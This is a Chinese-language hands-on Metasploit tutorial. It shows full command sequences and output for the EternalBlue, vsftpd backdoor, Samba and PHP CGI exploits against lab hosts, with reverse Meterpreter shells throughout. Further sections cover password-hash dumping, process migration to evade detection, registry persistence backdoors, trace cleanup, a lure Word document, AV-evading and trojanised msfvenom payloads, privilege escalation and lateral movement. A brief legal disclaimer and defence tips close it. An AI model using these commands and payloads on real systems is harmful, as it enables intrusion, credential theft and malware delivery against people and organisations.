一、手把手教学:永恒之蓝漏洞攻防实战详解
1.1 漏洞背景与核心原理
漏洞编号:MS17-010(CVE-2017-0144)
影响范围:Windows Vista/7/8.1/10,Windows Server 2008/2012/2016
漏洞类型:SMB协议远程代码执行漏洞
危害等级:严重(CVSS 8.8/10)
永恒之蓝漏洞位于Windows SMBv1协议处理模块中,攻击者通过发送精心构造的恶意数据包,可以实现远程代码执行,进而完全控制目标系统。这个漏洞是2017年"WannaCry"勒索软件爆发的根源,造成了全球性的网络安全危机。
1.2 环境搭建详细步骤
攻击环境准备:
bash
# 1. 攻击机配置(Kali Linux)
# 检查网络配置
ifconfig eth0
# 确保IP地址为:192.168.1.10
# 2. 安装必要的工具
sudo apt update
sudo apt install metasploit-framework -y
# 3. 启动Metasploit数据库
sudo systemctl start postgresql
sudo msfdb init靶机环境准备:
靶机:Windows 7 SP1(x64)
配置要求:
- 禁用Windows防火墙
- 确保445端口开放
- 确认未安装KB4012212/KB4012215补丁
- IP地址:192.168.1.1001.3 详细攻击流程解析
步骤1:启动MSF并搜索相关模块
bash
# 启动MSF控制台
msfconsole
# 在MSF控制台中搜索永恒之蓝模块
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution说明:这里显示了3个相关模块:
-
模块0:永恒之蓝核心漏洞利用模块
-
模块1:漏洞检测扫描模块
-
模块2:利用漏洞进行Psexec攻击的模块
步骤2:使用扫描模块确认漏洞存在
bash
# 使用扫描模块
msf6 > use auxiliary/scanner/smb/smb_ms17_010
# 查看模块配置选项
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
# 设置目标IP
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# 执行扫描
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed结果解读:
-
如果看到
VULNERABLE提示,表示目标存在漏洞 -
如果看到
NOT vulnerable,则表示目标已打补丁
步骤3:使用永恒之蓝攻击模块
bash
# 返回上级
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
# 使用永恒之蓝攻击模块
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# 查看模块详细信息
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x86, x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14步骤4:配置攻击参数
bash
# 查看需要设置的参数
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
# 设置目标IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
# 查看可用的Payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 generic/custom normal No Custom Payload
1 generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
4 windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
# 选择Meterpreter反向TCP Payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
# 查看Payload需要设置的参数
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.100 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
# 设置攻击机IP和端口
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444步骤5:执行攻击
bash
# 执行攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] 192.168.1.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.100:445 - Connecting to target for exploitation.
[+] 192.168.1.100:445 - Connection established for exploitation.
[+] 192.168.1.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.100:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.1.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.1.100:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.1.100:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.1.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.100:445 - Starting non-paged pool grooming
[+] 192.168.1.100:445 - Sending SMBv2 buffers
[+] 192.168.1.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.100:445 - Sending final SMBv2 buffers.
[*] 192.168.1.100:445 - Sending last fragment of exploit packet
[*] 192.168.1.100:445 - Receiving response from exploit packet
[+] 192.168.1.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.100:445 - Sending egg to corrupted connection.
[*] 192.168.1.100:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.100:49158) at 2023-10-01 10:00:00 +0800
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >攻击过程解析:
-
启动反向TCP监听器
-
检测目标是否存在漏洞
-
建立SMB连接
-
发送精心构造的恶意数据包
-
利用内核池溢出漏洞
-
发送Payload并执行
-
建立Meterpreter会话
1.4 Meterpreter会话详细操作
获得Meterpreter会话后,可以进行各种后渗透操作:
bash
# 1. 获取系统信息
meterpreter > sysinfo
Computer : WIN7-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
# 2. 获取当前权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# 3. 获取进程列表
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
264 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
332 324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
384 376 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
... ... ... ... ... ... ...
# 4. 进程迁移(重要:避免被检测)
meterpreter > getpid
Current pid: 3724
meterpreter > migrate 656
[*] Migrating from 3724 to 656...
[*] Migration completed successfully.
# 5. 屏幕截图
meterpreter > screenshot
Screenshot saved to: /root/WjVfJmhT.jpeg
# 可以打开查看:xdg-open /root/WjVfJmhT.jpeg
# 6. 获取用户密码哈希
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# 7. 启用远程桌面
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20231001100000_default_192.168.1.100_host.windows.cle_123456.txt1.5 创建持久后门
bash
# 1. 使用persistence模块创建持久后门
meterpreter > run persistence -U -i 60 -p 4444 -r 192.168.1.10
[*] Running Persistence Script
[*] Resource file for cleanup created: /root/.msf4/logs/persistence/WIN7-PC_20231001.1000.ps1
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444
[*] Persistent agent script is 99627 bytes long
[+] Persistent Script written to C:\Windows\TEMP\default.exe
[*] Executing script C:\Windows\TEMP\default.exe
[+] Agent executed with PID 4084
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QfVhLzVlWXv参数说明:
-
-U:用户登录时启动 -
-i 60:每60秒尝试连接一次 -
-p 4444:连接端口 -
-r 192.168.1.10:攻击机IP地址
1.6 清理痕迹
bash
# 1. 查看创建的持久化脚本位置
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Name: QfVhLzVlWXv
Data: C:\Windows\TEMP\default.exe
# 2. 删除注册表项
meterpreter > reg deleteval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v QfVhLzVlWXv
[*] Deleted QfVhLzVlWXv from HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# 3. 删除可执行文件
meterpreter > rm C:\\Windows\\TEMP\\default.exe二、Linux靶机渗透:Metasploitable 2攻防实战
2.1 靶机:Metasploitable 2介绍
Metasploitable 2是专门为渗透测试学习设计的漏洞靶机,包含多种常见漏洞:
主要服务:
-
FTP (vsftpd 2.3.4)
-
SSH (OpenSSH 4.7p1)
-
Telnet
-
SMTP
-
HTTP (Apache 2.2.8)
-
Samba (3.x)
-
MySQL
-
PostgreSQL
-
等等
IP地址:192.168.1.150
2.2 利用vsftpd 2.3.4后门漏洞
bash
# 1. 搜索vsftpd漏洞
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD v2.3.4 Backdoor Command Execution
# 2. 使用漏洞利用模块
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
# 3. 查看模块信息
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
# 4. 配置参数
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
# 5. 设置目标IP
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
# 6. 执行攻击
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.150:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.150:21 - USER: 331 Please specify the password.
[+] 192.168.1.150:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.150:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.1.10:4444 -> 192.168.1.150:6200) at 2023-10-01 10:30:00 +0800
# 7. 验证权限
whoami
root
pwd
/
ls -la漏洞原理:
vsftpd 2.3.4版本存在后门,当用户名包含特定字符时,会在6200端口打开一个shell。这个后门是攻击者故意插入的。
2.3 利用Samba漏洞
bash
# 1. 搜索Samba漏洞
msf6 > search samba
# 2. 使用usermap_script漏洞
msf6 > use exploit/multi/samba/usermap_script
# 3. 配置参数
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
# 4. 执行攻击
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Command shell session 3 opened (192.168.1.10:4444 -> 192.168.1.150:56728) at 2023-10-01 10:40:00 +0800
whoami
root三、Web应用漏洞利用案例深度解析
3.1 PHP代码注入漏洞利用
bash
# 1. 使用PHP CGI参数注入漏洞
msf6 > use exploit/multi/http/php_cgi_arg_injection
# 2. 配置参数
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf6 exploit(multi/http/php_cgi_arg_injection) > set TARGETURI /vulnerable.php
TARGETURI => /vulnerable.php
msf6 exploit(multi/http/php_cgi_arg_injection) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
# 3. 执行攻击
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Sending stage (39927 bytes) to 192.168.1.200
[*] Meterpreter session 4 opened (192.168.1.10:4444 -> 192.168.1.200:443) at 2023-10-01 11:00:00 +0800
meterpreter > sysinfo
Computer : webserver
OS : Linux webserver 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
Meterpreter : php/linux3.2 Web目录扫描实战
bash
# 1. 使用dir_scanner模块
msf6 > use auxiliary/scanner/http/dir_scanner
# 2. 配置参数
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf6 auxiliary(scanner/http/dir_scanner) > set RPORT 80
RPORT => 80
msf6 auxiliary(scanner/http/dir_scanner) > set THREADS 20
THREADS => 20
msf6 auxiliary(scanner/http/dir_scanner) > set PATH /usr/share/wordlists/dirb/common.txt
PATH => /usr/share/wordlists/dirb/common.txt
# 3. 执行扫描
msf6 auxiliary(scanner/http/dir_scanner) > run
[*] Detecting error code
[*] Using code '404' as not found for 192.168.1.200
[*] Found http://192.168.1.200:80/admin/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/backup/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/config/ 200 (192.168, 192.168.1.200)
[*] Found http://192.168.1.200:80/phpmyadmin/ 200 (192.168.1.200)
[*] Found http://192.168.1.200:80/upload/ 200 (192.168.1.200)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed四、高级攻击技术:社会工程学与权限维持
4.1 社会工程学攻击:恶意文档生成
bash
# 1. 使用MSF生成恶意Word文档
msf6 > use exploit/windows/fileformat/office_word_hta
# 2. 配置参数
msf6 exploit(windows/fileformat/office_word_hta) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/fileformat/office_word_hta) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/fileformat/office_word_hta) > set FILENAME 重要通知.doc
FILENAME => 重要通知.doc
# 3. 生成恶意文档
msf6 exploit(windows/fileformat/office_word_hta) > exploit
[*] Creating '重要通知.doc' file ...
[+] 重要通知.doc stored at /root/.msf4/local/重要通知.doc攻击流程:
-
将生成的恶意文档发送给目标用户
-
当用户打开文档时,会触发恶意代码
-
建立Meterpreter会话
4.2 绕过杀毒软件的免杀Payload
bash
# 1. 使用msfvenom生成免杀Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload.exe
# 2. 使用多重编码增强免杀效果
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 5 | msfvenom -e x86/countdown -i 5 -f exe -o payload_encoded.exe
# 3. 嵌入正常程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -x /usr/share/windows-binaries/putty.exe -f exe -o putty_backdoor.exe4.3 权限提升案例
bash
# 在已获取的Meterpreter会话中
# 1. 查看当前权限
meterpreter > getuid
Server username: WIN7-PC\User
# 2. 尝试本地提权
meterpreter > background
[*] Backgrounding session 1...
# 搜索本地提权模块
msf6 > search platform:windows type:exploit local
# 3. 使用MS16-032提权漏洞
msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
# 4. 配置参数
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 5555
LPORT => 5555
# 5. 执行提权
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 192.168.1.10:5555
[*] Writing payload : 738 bytes...
[*] Exploit completed, but no session was created.五、综合实战:完整渗透测试流程
5.1 信息收集阶段
bash
# 1. 使用NMAP进行端口扫描
nmap -sS -sV -O -p- 192.168.1.0/24
# 2. 使用MSF辅助模块扫描
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 100
msf6 auxiliary(scanner/portscan/tcp) > run
# 3. 服务版本识别
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run5.2 漏洞扫描阶段
bash
# 1. 使用Nessus导入MSF
msf6 > load nessus
[*] Nessus Bridge for Metasploit 1.2.1
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
# 2. 使用OpenVAS
msf6 > load openvas
[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*] Successfully loaded plugin: openvas5.3 漏洞利用阶段
根据扫描结果选择合适的漏洞利用模块,如前文所示的永恒之蓝、Samba漏洞等。
5.4 后渗透阶段
bash
# 1. 获取敏感信息
meterpreter > run post/windows/gather/credentials/windows_autologin
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
# 2. 横向移动
meterpreter > run post/windows/gather/enum_ad_users
meterpreter > run post/windows/gather/enum_ad_computers
# 3. 权限维持
meterpreter > run persistence -U -i 60 -p 4444 -r 192.168.1.10六、注意事项与防御建议
6.1 攻击注意事项
-
合法授权:只在获得书面授权的环境中进行测试
-
影响评估:了解攻击可能造成的影响,避免生产环境崩溃
-
数据备份:攻击前备份重要数据
-
时间选择:在业务低峰期进行测试
-
记录日志:详细记录每一步操作
6.2 防御建议
-
及时更新:定期安装系统补丁
-
最小权限:遵循最小权限原则
-
网络隔离:划分网络安全区域
-
安全监控:部署IDS/IPS系统
-
安全意识:加强员工安全意识培训
七、MSF常用命令速查表
bash
# 基本信息
version # 查看MSF版本
banner # 显示横幅
help # 查看帮助
history # 查看命令历史
# 模块管理
use # 使用模块
back # 返回上级
search # 搜索模块
info # 查看模块信息
show options # 显示模块选项
show payloads # 显示可用Payload
# 会话管理
sessions # 查看会话列表
sessions -i ID # 进入指定会话
background # 后台当前会话
sessions -k ID # 结束指定会话
# 数据库操作
db_status # 查看数据库状态
db_nmap # 执行NMAP扫描并导入结果
db_import # 导入扫描结果
db_hosts # 查看主机列表
db_services # 查看服务列表总结
通过以上详细的案例介绍,你应该对MSF的实战应用有了更深入的理解。从信息收集、漏洞扫描、漏洞利用到后渗透,MSF提供了一个完整的渗透测试解决方案。记住,技术是中立的,关键在于使用者的目的。希望你能将所学知识用于合法的安全测试和安全防御工作中。
学习路径建议:
-
搭建虚拟实验环境
-
从基础模块开始练习
-
复现经典漏洞案例
-
尝试组合多种攻击技术
-
学习编写自己的模块
-
参与CTF比赛和漏洞挖掘实践
网络安全是一个不断发展的领域,只有持续学习和实践,才能保持竞争力。祝你在网络安全的学习道路上不断进步!
最后提醒:本文所有技术仅用于学习防御。未经授权的测试是违法行为,请一定通过合法途径学习和实践网络安全技术。
用你的技能让网络世界更安全,而不是更危险。每个技术人员都有责任保护用户的安全和隐私。
安全之路,正道而行。